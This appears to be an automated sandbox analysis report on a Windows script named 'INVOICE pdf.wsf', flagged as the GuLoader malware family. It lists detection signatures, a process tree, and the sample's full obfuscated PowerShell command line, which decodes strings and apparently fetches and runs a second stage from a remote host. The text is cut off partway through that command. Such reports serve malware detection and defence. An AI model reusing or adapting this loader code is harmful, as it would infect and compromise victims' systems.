Edit tour
Windows
Analysis Report
INVOICE pdf.wsf
Overview
General Information
Detection
GuLoader
Score: | 100 |
Range: | 0 - 100 |
Whitelisted: | false |
Confidence: | 100% |
Signatures
Antivirus detection for URL or domain
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
VBScript performs obfuscated calls to suspicious functions
Yara detected GuLoader
Found suspicious powershell code related to unpacking or dynamic code loading
Sample has a suspicious name (potential lure to open the executable)
Suspicious execution chain found
Suspicious powershell command line found
Uses ping.exe to check the status of other devices and networks
Uses ping.exe to sleep
Very long command line found
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Wscript starts Powershell (via cmd or directly)
Abnormal high CPU Usage
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Java / VBScript file with very long strings (likely obfuscated code)
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match
Classification
- System is w10x64
- wscript.exe (PID: 7508 cmdline:
C:\Windows \System32\ WScript.ex e "C:\User s\user\Des ktop\INVOI CE pdf.wsf " MD5: A47CBE969EA935BDD3AB568BB126BC80) - PING.EXE (PID: 7536 cmdline:
ping 127.0 .0.1 -n 1 MD5: 2F46799D79D22AC72C241EC0322B011D) - conhost.exe (PID: 7544 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - PING.EXE (PID: 7604 cmdline:
ping %.%.% .% MD5: 2F46799D79D22AC72C241EC0322B011D) - conhost.exe (PID: 7612 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - cmd.exe (PID: 7664 cmdline:
C:\Windows \system32\ cmd.exe /c dir MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE) - conhost.exe (PID: 7672 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - powershell.exe (PID: 7732 cmdline:
"C:\Window s\System32 \WindowsPo werShell\v 1.0\powers hell.exe" "$Srbrns = 1;$Headli ng='Substr in';$Headl ing+='g';F unction Fr emtidsmuli gheders($E lmiernflat able){$Udd annelsesaf delingerne =$Elmiernf latable.Le ngth-$Srbr ns;For($El mier=5; $E lmier -lt $Uddannels esafdeling erne; $Elm ier+=(6)){ $Undepreci ative+=$El miernflata ble.$Headl ing.Invoke ($Elmier, $Srbrns);} $Undepreci ative;}fun ction Udsl yngende($b arm){& ($deform ing) ($bar m);}$Pavio ur=Fremtid smulighede rs ' ThemM BentjoTumu lz counino nbilSo erl KonnaHels s/ Mus.5Ma egl.Journ0 Enlac Ci r (vesp,W Mo riiPhthon AnoddKejs, oanal wDaw ttsEnkel E mascNSe,ic T Reof Opt im1Kanal0N ac o.Eviln 0 Cohe;Bio te restWAn ,stiBagtan digam6 nse 4Teleo;Exi st Labox f ,sk6 mas,4 ukoll;Sinu s Cinqur , ntrvPtafi: Insta1H lo g2 Fals1 D ehu.D nsk0 Photo)Konf o S,igmG K lbbeMiljic Hjr,mkViev aomacro/.r ing2 Rute0 Tyngd1Iagt t0Twirl0Af ste1Storm0 Termo1Hors . SnrehFNu cleiPoppar Ye,hoewife hfTaranoC. araxThy s/ ar en1Abav e2 orsi1Ik ono.Dotti0 Wordi ';$P resserende s=Fremtids muligheder s ',pittUP rcissTimia eCharmrSau .e- UtakAp ocrgIture ealbifnCon ,it avyt ' ;$Hustanke s=Fremtids muligheder s ' TephhR und tFootb tLim,sp Gl yp:Respe/R egie/Negat oA.stir.am eliScurvgs ammeiUngri nCheeraS,r uplFejlhcP rolooDgnaa nOsmogc ri veFil,hpPe att Nyh,s konsoiT,iu mnSuniocSm u t.Cerv.r nsinulo.u s.CompucBa cksoKogejm H.sge/ usw iaopsens . rked.omplt Spi e/Proj eKLevera D agsrSkraad CombiiImag on TritaBa rsel Subgi Forbitfloc ceFor.rtNe edee domir adver.Opsn upDebugfSk abeb saer ';$Agricol ous=Fremti dsmulighed ers '.onke >Sorts ';$ deforming= Fremtidsmu ligheders ',mpudiRev ereGobsmxa bbre ';$Be frogged = Fremtidsmu ligheders 'Bas.geEti olc PlanhP araloOlier flapp%Sol sya.torip Catep D,ow dSubc aBge rbtStrenaI ng.n%Skiin \AsparBLik vieNebran Sta,zSenge i AnthdTva ngi.skarnT .lgaeSpids 2Stro 3 ec on3Ski d. GrosSCamou jC,terlPro ra Smok&Cu rta&Dipsa Afsjle Af uc ntomh k raoSalam D ephl$Frugt ';Udslyng ende (Frem tidsmuligh eders 'Pan to$treergM odiflCel,s okermab Ka r a Bolil issa: kval MFilmfa.ni veu ilmer H,meeAric rAde onKod ake Un,e= Folk(Kraft cGilbemPer pedMadre l ifto/ Mo o cPatho Kal kv$No,psBh appeeKanae fHalobr fn ugoUnriggK lassgUn.ar eBygnid Fl eu) Re i ' );Udslynge nde (Fremt idsmulighe ders 'f.aa r$ akshgEc toglRavino Opr,jbangu saDe orlMa ler:A mrkC .ltrahDraw aaDatelrM. rblmCo.che AarsuGray fsNsk,beBe ds rneighn Neuroe Apo ssIndda=U. kla$FredsH ThumbuBomb esPyromt P ,rtaSprinn JounckBede aeTilsysPa lin.Dagmas .enoppHipp algr seiBe fritJernb( Op,as$Sk,i nACara.gDu n erK,eoli s ocucChir oo VililB. itooPi,peu Ocells.nta r) Bu.c ') ;$Hustanke s=$Charmeu sernes[0]; Udslyngend e (Fremtid